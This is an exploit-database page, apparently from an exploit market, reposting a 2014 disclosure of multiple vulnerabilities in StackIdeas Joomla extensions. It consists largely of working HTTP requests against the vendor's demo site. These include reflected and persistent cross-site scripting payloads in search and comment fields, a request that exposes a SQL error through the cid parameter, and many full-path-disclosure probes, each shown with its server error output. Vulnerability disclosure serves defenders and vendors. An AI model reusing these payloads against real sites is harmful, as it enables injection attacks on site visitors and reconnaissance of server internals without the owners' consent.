[ home ]  [ private ]  [ 0Day ]  [ discount ]  [ Get Gold ]  [ platforms ]  [ pentest ]  [ search ]  [ faq ]  [ contact ]  [ style ]  [ Prices in Gold ]   db: 39 583    
0day Today Exploit DB Official Facebook
0day Today Exploit DB Official Twitter
0day Today Exploit DB Official RSS Channel
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - Biggest Exploit Database in the World.
Select your language:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
Things you should know about 0day.today:
  • We use one main domain: http://0day.today
  • Most of the materials is completely FREE
  • If you want to purchase the exploit / get V.I.P. access or pay for any other service,
    you need to buy or earn GOLD
We accept currencies: [contact admin to find more]
           
We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
I am registered user of 0day.today. I don't want to see this screen in future.
What to do first?
  1. Read the [ agreement ]
  2. Read the [ Submit ] rules
  3. Visit the [ faq ] page
  4. [ Register ] profile
  5. Get [ GOLD ]
  6. If you want to [ sell ]
  7. If you want to [ buy ]
  8. If you lost [ Account ]
  9. Any questions [ admin@0day.today ]


Main links


You can contact us by

Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day Today Exploits Market and 0day Exploits Database

Joomla StackIdeas Extensions Multiple Vulnerabilities

Author
Smash_
Risk
[
Security Risk High
]
0day-ID
0day-ID-21799
Category
web applications
Date add
23-01-2014
Platform
php
#Title: Joomla StackIdeas Extensions Multiple Vulnerabilities
#Date: 01.23.2014
#Vendor: stackideas.com / extensions.joomla.org/extensions/owner/jack-2Estackideas
#Demo: demo.stackideas.com
#Contant: smash[at]devilteam.pl

#Note:

Tests were performed without an user account,
there is a high probability that there's more vulnerabilities.

Affected extensions:
- SectionEx
- Komento
- Easy Discuss 
- Easy Blog
- Easy Social


#SectionEx - demo.stackideas.com/sectionex - Version 2.5.104 (Latest ATM)

1. Cross Site Scripting in Search Bar

Request (filter_title):
POST /sectionex HTTP/1.1
Host: demo.stackideas.com
filter_title=666" onmouseover=alert(666) bad="&task=&sectionid=2&filter_order=&filter_order_Dir=

Request (filter_oreder_Dir):
POST /sectionex HTTP/1.1
Host: demo.stackideas.com
filter_title=666&task=&sectionid=2&filter_order=&filter_order_Dir=" xssed=true bad="

filter_order_Dir is an hidden input parameter:
<input type="hidden" id="filter_order_Dir" name="filter_order_Dir" value="" xssed=true bad="" />

2. Full Path Disclosure in Search Bar

POST /sectionex HTTP/1.1
Host: demo.stackideas.com
filter_title[]=XSS&task[]=&task[]=&sectionid[]=2&filter_order[]=&filter_order_Dir[]=

Error:
Warning: strtolower() expects parameter 1 to be string, array given in /home/admin/demo.stackideas.com/components/com_sectionex/models/category.php on line 649


#Komento - demo.stackideas.com/komento - Version 1.7.3 (Latest ATM)

1. Persistent Cross Site Scripting - Post Comment

POST /?option=com_komento HTTP/1.1
Host: demo.stackideas.com
tmpl=component&format=ajax&no_html=1&component=com_content&cid=2&comment=a&parent_id=0&name=666&email=&website=&subscribe=false&latitude=666&longitude=" onmouseover=alert(666) bad="&address=&contentLink=http%3A%2F%2Fdemo.stackideas.com%2Fkomento%2F2-starting-up-a-joomla-blog-with-easyblog&pageItemId=435&option=com_komento&namespace=site.views.komento.addcomment&80a1a7163a3f7e15ed93a3aeaf5abe37=1

You are able to inject code while adding custom Google Location.
Href is displayed next to your nick-name:
<i></i><a href="http://maps.google.com/maps?z=15&amp;q=666" onmouseover=alert(666) bad="" target="_blank">666</a>

2. SQL Error

Request:
POST /?option=com_komento HTTP/1.1
Host: demo.stackideas.com

tmpl=component&format=ajax&no_html=1&component=com_content&cid=SUP&total=2&option=com_komento&namespace=site.views.komento.checknewcomment&c1403db176705ee19ee8b32f4257b2dc=1


Response:
HTTP/1.1 500 Internal Server Error
Date: Wed, 22 Jan 2014 20:31:01 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Status: 1054 Unknown column 'SUP' in 'where clause' SQL=SELECT COUNT(1) FROM `jos_komento_comments` WHERE `component` = 'com_content' AND `cid` = SUP AND `published` = '1'
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 6325
Connection: close
Content-Type: text/html; charset=utf-8

3. Full Path Disclosure - POST format

POST /?option=com_komento HTTP/1.1
Host: demo.stackideas.com

tmpl=component&format=666&no_html=1&option=com_komento&namespace=site.views.komento.shortenLink&17de86dda6e238e378e6208aa3d5467a=1

Response:
HTTP/1.1 200 OK
Date: Thu, 23 Jan 2014 20:04:31 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 158
Connection: close
Content-Type: text/html; charset=UTF-8


Fatal error: Call to undefined method JDocumentRaw::addCustomTag() in /home/admin/demo.stackideas.com/media/foundry/3.1/joomla/configuration.php on line 111



#Easy Discuss - demo.stackideas.com/easydiscuss - Version 3.2.9289 (Latest ATM)

1. Full Path Disclosure

a)  Subscribe via email

Request:
POST /index.php?option=com_easydiscuss&lang=none&tmpl=component&no_html=1&format=ajax&uid=1390488615438 HTTP/1.1
Host: demo.stackideas.com
&view=index&layout=ajaxSubscribe&value0=SUP?&value1=0&0767ca009520df2ba9b1b33569fd2d48=1

Error:
Invalid template file /home/admin/demo.stackideas.com/components/com_easydiscuss/themes/simplistic/dialogs/ajax.subscribe.SUP?.php



b)  Language

Request:
POST /?option=com_easydiscuss&tmpl=component&no_html=1&controller=foundry&task=getResource HTTP/1.1
Host: demo.stackideas.com

resource%5B0%5D%5Btype%5D=languageSUP&resource%5B0%5D%5Bname%5D=COM_EASYDISCUSS_TERMS_PLEASE_ACCEPT&resource%5B0%5D%5Bid%5D=Resource07243760213479968'>"><>XSS&resource%5B1%5D%5Btype%5D=language&resource%5B1%5D%5Bname%5D=COM_EASYDISCUSS_COMMENT_SUCESSFULLY_ADDED&resource%5B1%5D%5Bid%5D=Resource08769055979183015&resource%5B2%5D%5Btype%5D=language&resource%5B2%5D%5Bname%5D=COM_EASYDISCUSS_COMMENT_LOAD_MORE&resource%5B2%5D%5Bid%5D=Resource0018291907032851662&resource%5B3%5D%5Btype%5D=language&resource%5B3%5D%5Bname%5D=COM_EASYDISCUSS_COMMENT_LOADING_MORE_COMMENTS&resource%5B3%5D%5Bid%5D=Resource034094943220855545&resource%5B4%5D%5Btype%5D=language&resource%5B4%5D%5Bname%5D=COM_EASYDISCUSS_COMMENT_LOAD_ERROR&resource%5B4%5D%5Bid%5D=Resource012465740294232164

Response:
HTTP/1.1 200 OK
Date: Thu, 23 Jan 2014 14:01:06 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 189
Connection: close
Content-Type: text/html; charset=UTF-8

Fatal error: Call to undefined method EasyDiscussControllerFoundry::getLanguageSUP() in /home/admin/demo.stackideas.com/components/com_easydiscuss/controllers/foundry.php on line 26

c) Controller

Request:
POST /?option=com_easydiscuss&tmpl=component&no_html=1&controller=SUP&task=getResource

Error:
HTTP/1.1 500 Internal Server Error
Date: Thu, 23 Jan 2014 19:55:35 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Status: 500 Invalid Controller name "sup".<br /> File "/home/admin/demo.stackideas.com/components/com_easydiscuss/controllers/sup.php" does not exists in this context.
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 6325
Connection: close
Content-Type: text/html; charset=utf-8

d) Task

Request:
POST /?option=com_easydiscuss&tmpl=component&no_html=1&controller=foundry&task=SUP

Error:
HTTP/1.1 200 OK
Date: Thu, 23 Jan 2014 19:55:35 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 167
Connection: close
Content-Type: text/html; charset=UTF-8


Fatal error: Call to a member function getName() on a non-object in /home/admin/demo.stackideas.com/components/com_easydiscuss/controllers/controller.php on line 234

e) Resource_type

POST /?option=com_easydiscuss&tmpl=component&no_html=1&controller=foundry&task=getResource HTTP/1.1
resource%5B0%5D%5Btype%5D='

HTTP/1.1 200 OK
Date: Thu, 23 Jan 2014 19:55:36 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 173
Connection: close
Content-Type: text/html; charset=UTF-8


Fatal error: Call to undefined method EasyDiscussControllerFoundry::get'() in /home/admin/demo.stackideas.com/components/com_easydiscuss/controllers/foundry.php on line 26




#Easy Blog - demo.stackideas.com/easyblog - Version 3.9.15188 (Latest ATM)


1. Full Path Disclosure - Subscribe to blog

Request:
POST /index.php?option=com_easyblog&lang=none&Itemid=508&tmpl=component&no_html=1&format=ejax&17de86dda6e238e378e6208
&view=subscription&layout=showForm&value0[]=siteSUP

Error:
HTTP/1.1 200 OK
Date: Thu, 23 Jan 2014 20:22:09 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 1847
Connection: close
Content-Type: text/html; charset=UTF-8


Warning: ucfirst() expects parameter 1 to be string, array given in /home/admin/demo.stackideas.com/components/com_easyblog/views/subscription/view.ejax.php on line 50

Warning: Cannot modify header information - headers already sent by (output started at /home/admin/demo.stackideas.com/components/com_easyblog/views/subscription/view.ejax.php:50) in /home/admin/demo.stackideas.com/components/com_easyblog/classes/ejax.php on line 120


2. Full Path Disclosure - Calendar value0 / value4 / value1 and so on

Request:
POST /index.php?option=com_easyblog&lang=none&Itemid=508&tmpl=component&no_html=1&format=ejax&17de86dda6e238e378e6208aa3d5467a=1&uid=1390512466510 HTTP/1.1
Host: demo.stackideas.com
&view=archive&layout=loadCalendar&value0='SUP'%3e%3c&value1=508&value2=small&value3=blog&value4=1391212800

Response:
HTTP/1.1 200 OK
Date: Thu, 23 Jan 2014 20:28:24 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 3067
Connection: close
Content-Type: text/html; charset=UTF-8


Notice: Undefined variable: namespace in /home/admin/demo.stackideas.com/components/com_easyblog/views/archive/view.ejax.php on line 58

Notice: Undefined variable: namespace in /home/admin/demo.stackideas.com/components/com_easyblog/views/archive/view.ejax.php on line 59

Notice: Undefined variable: namespace in /home/admin/demo.stackideas.com/components/com_easyblog/views/archive/view.ejax.php on line 66

Notice: Undefined variable: preFix in /home/admin/demo.stackideas.com/components/com_easyblog/views/archive/view.ejax.php on line 67

Warning: Cannot modify header information - headers already sent by (output started at /home/admin/demo.stackideas.com/components/com_easyblog/views/archive/view.ejax.php:58) in /home/admin/demo.stackideas.com/components/com_easyblog/classes/ejax.php on line 120


3. Full Path Disclosure - Post a comment

Request:
POST /index.php?option=com_easyblog&lang=none&Itemid=508&tmpl=component&no_html=1&format=ejax&17de86dda6e238e378e6208aa3d5467a=1&uid=1390512714175 HTTP/1.1
Host: demo.stackideas.com

&view=Entry&layout=commentSave&value0[]=title%3D&value0[]=comment%3D%252526quot%25253B%25253E%25253C%25253EXSS&value0[]=esusername%3D%252526quot%25253B%25253E%25253C%25253EXSS&value0[]=esname%3D%252526quot%25253B%25253E%25253C%25253EXSS&value0[]=esemail%3D%252526quot%25253B%25253E%25253C%25253EXSS&value0[]=url%3D%252526quot%25253B%25253E%25253C%25253EXSS&value0[]=id%3D19&value0[]=parent_id%3D0&value0[]=comment_depth%3D0&value0[]=controller%3Dblog&value0[]=task%3DcommentSave&value0[]=totalComment%3D0&value0[]=%3DSubmit%252520Your%252520Comment


Response:
HTTP/1.1 200 OK
Date: Thu, 23 Jan 2014 20:32:34 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 646
Connection: close
Content-Type: text/html; charset=UTF-8


Notice: Undefined index: comment in /home/admin/demo.stackideas.com/components/com_easyblog/views/entry/view.ejax.php on line 456

Warning: Cannot modify header information - headers already sent by (output started at /home/admin/demo.stackideas.com/components/com_easyblog/views/entry/view.ejax.php:456) in /home/admin/demo.stackideas.com/components/com_easyblog/classes/ejax.php on line 120
[["script","eblog.loader.doneLoading();"],["script","eblog.spinner.hide()"],["script","$(\"#comment\").addClass(\"input-error\");"],["script","eblog.element.focus('comment');"],["script","eblog.comment.displayInlineMsg('error', 'Comment is empty.');"]]



#Easy Social - extensions.joomla.org/extensions/clients-a-communities/communities/25616 - Version 1.1.5 (Latest ATM)

1. Full Path Disclosure - resource_type

Request:
POST /?option=com_easysocial&tmpl=component&no_html=1&controller=foundry&task=getResource HTTP/1.1
Host: demo.stackideas.com

resource%5B0%5D%5Btype%5D='%3e"%3e%3cSUP%3e&resource%5B0%5D%5Bname%5D=site%2Fnotifications%2Fsystem.empty&resource%5B0%5D%5Bid%5D=Resource07594590380558889

Response:
HTTP/1.1 200 OK
Date: Thu, 23 Jan 2014 20:46:32 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 179
Connection: close
Content-Type: text/html; charset=UTF-8


Fatal error: Call to undefined method EasySocialControllerFoundry::get'>"><SUP>() in /home/admin/demo.stackideas.com/components/com_easysocial/controllers/foundry.php on line 42

#  0day.today [2024-11-16]  #
0day Today Exploit Database buy and sell exploits type (local, remote, DoS, PoC, etc.)
Send all submissions to mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team